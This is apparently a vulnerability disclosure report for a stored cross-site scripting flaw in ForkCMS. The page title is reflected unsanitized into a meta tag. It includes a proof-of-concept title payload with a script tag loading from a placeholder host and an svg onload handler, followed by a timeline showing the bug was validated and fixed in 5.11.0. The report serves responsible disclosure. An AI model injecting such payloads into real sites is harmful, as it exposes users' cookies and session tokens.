Cross-site Scripting (XSS) - Stored in forkcms/forkcms


Reported on

Oct 19th 2021


Hello. ForkCMS does not properly sanitize the website's TITLE when it is imported into the meta tags.

Proof of Concept

If we set the page title to something like this: <title>Home - Hi'&gt;"&lt;script src=//xss&gt;&lt;/script&gt;&lt;x="{9*9}\r\n%0A%09%0D&lt;svg\onload=confirm(1)&gt;</title>

It gets reflected back here: <meta name="application-name" content="Hi'>&quot;<script src=//xss></script><x=&quot;{9*9}\r\n%0A%09%0D<svg\onload=confirm(1)>">


This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website.

We have contacted a member of the forkcms team and are waiting to hear back a year ago
Jelmer Prins validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins marked this as fixed in 5.11.0 with commit c21306 a year ago
Jelmer Prins has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation